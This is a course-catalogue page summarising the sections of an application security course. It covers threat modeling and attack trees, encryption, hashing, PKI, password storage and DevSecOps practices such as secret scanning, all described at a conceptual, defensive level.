Attack trees are a crucial tool in threat modeling that visually represent the various ways an attacker could compromise a system. By starting with a specific malicious objective, such as compromising a privileged user account, an attack tree breaks down this goal into sub-goals and tactics that an attacker might use, such as identifying a user with the account, attempting brute force attacks, or engaging in phishing schemes. Each node in the tree represents a potential method or condition required for the attack, and by analyzing these nodes, security teams can better understand vulnerabilities and prioritize their defenses accordingly.

To build an attack tree, you start by defining the attacker's main objective and then progressively break it down into smaller tasks. Each step in the process can be evaluated in terms of its cost or likelihood, which helps in assessing the overall risk of the attack. Tools like Deciduous make this process more intuitive by allowing users to graphically represent these attack paths, identify mitigating factors, and calculate the potential impact of different attack scenarios. In Deciduous, elements like facts, attacks, mitigations, and goals are color-coded to enhance clarity, making it easier to visualize and communicate the potential security risks within a system.

Demo of an attack tree

Continuous threat modeling is an approach that integrates the identification and mitigation of security threats throughout the entire software development life cycle, from initial design through to deployment. By incorporating threat modeling early, particularly during the design phase, and continuously updating it as the code and application evolve, teams can address potential vulnerabilities when they are least costly to mitigate. This approach aligns with Agile and DevOps methodologies, ensuring that security keeps pace with development and adapts to changing requirements, technologies, and emerging threats.

Key components of continuous threat modeling include early integration, where threats are identified and addressed as they arise; automation, which helps in detecting common security issues; and a risk-based approach, which prioritizes the most critical threats. Continuous threat modeling also emphasizes collaboration between development, operations, and security teams (DevSecOps), ensuring that security is an integral part of the development process. Regular assessments and updates ensure that the threat model remains effective, and the use of real-world threat intelligence allows security teams to stay ahead of potential risks.

Demo of Threagile

Threat modeling in the cloud involves recognizing both the unique advantages and challenges posed by cloud environments. Cloud systems typically benefit from built-in controls offered by cloud service providers (CSPs), which can enhance security. However, certain threats, such as administrative account compromise, can be more severe in the cloud, while others, like infrastructure protocol denial of service, might be less critical due to the inherent qualities of cloud services.

When creating a cloud threat model, it’s essential to consider not only the specific business objectives and cloud technologies being used but also the threats that could impact your CSP and, consequently, your operations. The rapid adoption of cloud technologies has sometimes outpaced traditional security methodologies, making it crucial to align threat modeling practices with the specifics of cloud services. The process involves identifying objectives, defining the scope, decomposing the application or service, identifying and rating threats, recognizing design weaknesses, designing mitigations, and regularly reevaluating the system. This structured approach helps ensure that organizations can effectively manage the unique security challenges of cloud environments, from IAM service configurations to cross-account access and data security.

Threat Modeling Quiz
Introduction to Encryption and Hashing

In this section, we covered the basics of encryption, focusing on the two main types: symmetric and asymmetric encryption. Symmetric encryption uses the same key for both encryption and decryption, making it fast and efficient for encrypting large amounts of data, with AES being the most well-known algorithm in this category. However, it poses challenges in securely distributing the encryption key. Asymmetric encryption, on the other hand, uses a pair of keys—public and private—where the public key is freely distributed, and the private key is kept secret. This method provides non-repudiation, meaning the sender cannot deny having sent a message, and it eliminates the need for securely sharing a secret key between parties. However, asymmetric encryption is slower and more complex, making it less ideal for large data encryption. Understanding the strengths and weaknesses of each type is crucial for selecting the appropriate encryption method based on the specific use case.

Various use cases for encryption

In this section, we explored the concept of hashing, which is a one-way process that generates a fixed output from an input, ensuring that the same input always produces the same hash. Hashing is crucial in various applications, including password storage, blockchain technology, integrity verification, and digital signatures. We also discussed several types of attacks on hashing algorithms, such as collision attacks, where two different inputs produce the same hash, and preimage attacks, where an attacker tries to reverse-engineer a hash to find its original input. Other attacks include dictionary and rainbow table attacks, which use precomputed tables to find hash matches, and birthday attacks, which exploit the probability of collisions. Understanding these potential vulnerabilities is essential for implementing secure hashing practices.

Hashing in action

In this section, we discussed Digital Certificates and Public Key Infrastructure (PKI), focusing on their roles in securing digital communications. A digital certificate, also known as an identity or public key certificate, is an electronic document that proves ownership of a public key, containing information about the key, its owner, and the digital signature of a trusted Certificate Authority (CA) that has verified the certificate's contents. These certificates are essential for authenticating the identity of websites, users, devices, and servers, ensuring secure communication over the internet. PKI is a comprehensive system that manages public key encryption and digital certificates, involving various components like Certificate Authorities, Registration Authorities, and Certificate Management Systems. PKI provides robust encryption and authentication, making it critical for enterprise security. We also touched on Certificate-Based Authentication (CBA), which uses digital certificates for verifying identities, offering enhanced security by reducing reliance on traditional passwords.

In this session, we explored essential practices for password security, focusing on creating strong, unique passwords, implementing secure storage mechanisms, and utilizing advanced authentication methods. Key recommendations include using long, random passwords, enabling multi-factor authentication, and securely storing passwords with cryptographic hashing techniques like Argon2, scrypt, or bcrypt. Salting and hashing ensure that even if password hashes are compromised, they remain difficult to crack. Additionally, understanding entropy's role in password strength helps in creating more secure systems. By following these best practices, organizations can effectively protect against password-related vulnerabilities and enhance overall security.

Password best practices demo

This quiz will test your knowledge of encryption and hashing.

DevSecOps and Secure CICD

In this section, we explored the concepts of DevOps and CI/CD (Continuous Integration and Continuous Delivery/Deployment). DevOps is a cultural and philosophical approach that emphasizes collaboration between development and operations teams, aiming to deliver high-quality products swiftly and efficiently. It integrates Agile and Lean principles to foster gradual development and fast software delivery.

In this section, we explore the concept of DevSecOps, which is the integration of security practices into the DevOps process to ensure that security is a fundamental part of software delivery from the very beginning. DevSecOps aims to achieve secure software delivery at high speeds without compromising the integrity or safety of the application. The core principle of DevSecOps is to embed security throughout the entire development lifecycle, fostering a culture where everyone, from developers to operations teams, is responsible for security.

In this section, we explored the role of design within a DevSecOps framework, emphasizing the importance of threat modeling. Threat modeling is a structured approach to identifying and managing potential security threats, focusing on the most critical vulnerabilities during the design phase. By integrating this process early in the development lifecycle, organizations can reduce remediation costs, improve understanding of system interactions, and create detailed representations of the architecture and data flows.

The threat modeling process involves defining the scope by identifying system boundaries and critical assets, creating diagrams that outline data flows and architecture, using methodologies like STRIDE to identify potential threats, assessing risks using models like DREAD, and defining strategies to mitigate those threats. This process is not a one-time task but a continuous, collaborative effort that is regularly updated throughout the development lifecycle, ensuring that security is embedded into the design from the start. As development moves from design to implementation, these insights from threat modeling guide secure coding practices and overall system integrity.

In a DevSecOps environment, coding practices remain consistent with traditional SDLC processes, but with a stronger emphasis on automating the detection of vulnerabilities, particularly regarding secrets and code quality. One key focus is secret scanning, which aims to prevent the exposure of sensitive information like passwords and secret keys. This is crucial since hard-coded credentials are a prevalent issue highlighted by OWASP and various bug bounty programs. To mitigate this, tools and practices should be implemented to scan for secrets at multiple stages, including pre-commit stages, within code repositories, and throughout the CI/CD pipeline. Pre-commit hooks can provide immediate feedback to developers, preventing sensitive data from being committed. Additionally, regular repository scans should be conducted to identify and remove any exposed secrets, treating them as compromised and invalidating them immediately.

Save this course

Save Application Security - The Complete Guide to your list so you can find it easily later:
Save

Activities

Coming soon We're preparing activities for Application Security - The Complete Guide. These are activities you can do either before, during, or after a course.

Career center

Learners who complete Application Security - The Complete Guide will develop knowledge and skills that may be useful to these careers:

Reading list

We haven't picked any books for this reading list yet.

Share

Help others find this course page by sharing it with your friends and followers:

Similar courses

Similar courses are unavailable at this time. Please try again later.
Our mission

OpenCourser helps millions of learners each year. People visit us to learn workspace skills, ace their exams, and nurture their curiosity.

Our extensive catalog contains over 50,000 courses and twice as many books. Browse by search, by topic, or even by career interests. We'll match you to the right resources quickly.

Find this site helpful? Tell a friend about us.

Affiliate disclosure

We're supported by our community of learners. When you purchase or subscribe to courses and programs or purchase books, we may earn a commission from our partners.

Your purchases help us maintain our catalog and keep our servers humming without ads.

Thank you for supporting OpenCourser.

© 2016 - 2025 OpenCourser